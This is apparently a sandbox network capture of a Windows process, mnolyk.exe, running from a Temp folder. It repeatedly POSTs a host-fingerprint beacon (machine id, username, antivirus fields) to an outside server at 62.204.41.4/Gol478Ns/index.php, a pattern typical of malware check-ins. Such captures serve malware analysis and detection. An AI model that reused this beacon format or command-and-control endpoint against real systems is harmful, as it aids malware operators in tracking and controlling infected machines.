                                                        Feb 6, 2023 14:17:55.677694082 CET | 447 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.744800091 CET | 447 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        247 | 192.168.2.5 | 49937 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:55.913688898 CET | 448 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:55.976597071 CET | 448 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        248 | 192.168.2.5 | 49938 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:56.145927906 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.213244915 CET | 449 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        249 | 192.168.2.5 | 49939 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:56.379898071 CET | 450 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.443176031 CET | 450 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        25 | 192.168.2.5 | 49715 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:35.302871943 CET | 225 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:35.368762016 CET | 226 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        250 | 192.168.2.5 | 49940 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:56.613135099 CET | 451 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.676527023 CET | 451 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        251 | 192.168.2.5 | 49941 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:56.852297068 CET | 452 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.916233063 CET | 452 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        252 | 192.168.2.5 | 49942 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:57.083817959 CET | 453 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.152782917 CET | 453 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        253 | 192.168.2.5 | 49943 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:57.392401934 CET | 454 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.457815886 CET | 454 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        254 | 192.168.2.5 | 49944 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:57.633328915 CET | 455 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.696747065 CET | 455 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        255 | 192.168.2.5 | 49945 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:57.866705894 CET | 456 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.932298899 CET | 456 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        256 | 192.168.2.5 | 49946 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:58.119194984 CET | 457 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.185362101 CET | 457 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        257 | 192.168.2.5 | 49947 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:58.363275051 CET | 458 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.427375078 CET | 458 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        258 | 192.168.2.5 | 49948 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:58.606494904 CET | 459 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.671230078 CET | 459 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        259 | 192.168.2.5 | 49949 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:58.849591017 CET | 460 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.914136887 CET | 460 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        26 | 192.168.2.5 | 49716 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:36.096630096 CET | 226 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:36.170519114 CET | 227 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        260 | 192.168.2.5 | 49950 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:59.104526997 CET | 461 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.169317961 CET | 461 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        261 | 192.168.2.5 | 49951 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:59.351610899 CET | 462 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.418251038 CET | 462 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        262 | 192.168.2.5 | 49952 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:59.609623909 CET | 463 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.671968937 CET | 463 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        263 | 192.168.2.5 | 49953 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:59.850997925 CET | 464 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
